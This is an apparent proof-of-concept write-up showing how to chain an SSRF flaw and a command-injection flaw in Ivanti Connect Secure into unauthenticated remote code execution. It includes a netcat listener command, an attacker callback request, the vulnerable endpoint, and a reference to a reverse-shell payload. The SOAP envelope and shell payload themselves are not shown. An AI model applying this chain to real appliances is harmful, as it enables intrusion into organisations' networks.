CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component which allows an attacker to access certain restricted resources without authentication.
CVE-2024-21887 is a command injection vulnerability which allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
Both vulnerabilities affect Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA. When used together it allows an unauthenticated user to execute commands on the vulnerable target system.
SSRF POC
To perform an SSRF and make saml-server perform an HTTP request to a machine we control (192.168.86.35 in the below example), the following SOAP envelope can be used (saved to a file called post_data.xml).
Capture the callback from the vulnerable server with netcat.
> nc -lvnp 4488
GET /exploit.se HTTP/1.0
Host: 192.168.86.35:4444
Chaining SSRF and CVE-2024-21887 for RCE
The injection vulnerability exists in the /api/v1/license/keys-status endpoint, and is reachable via a single HTTP GET request.
The Python back end that services the /api/v1/license/keys-status endpoint listens on a locally bound port 8090. Therefore, we can exploit this command injection via an HTTP GET request to http://127.0.0.1:8090/api/v1/license/keys-status if the HTTP GET request occurs on the appliance itself, for example via an SSRF vulnerability. As authentication is performed by the front-end web server and not the back-end services, no authentication is needed. This allows us to leverage the SSRF vulnerability to bypass the original mitigation from Ivanti, which imposed filtering restrictions in the front-end web server.
Modify the SSRF URI as follows. This will trigger the command injection and run a Python-based reverse shell payload back to our attacker machine.
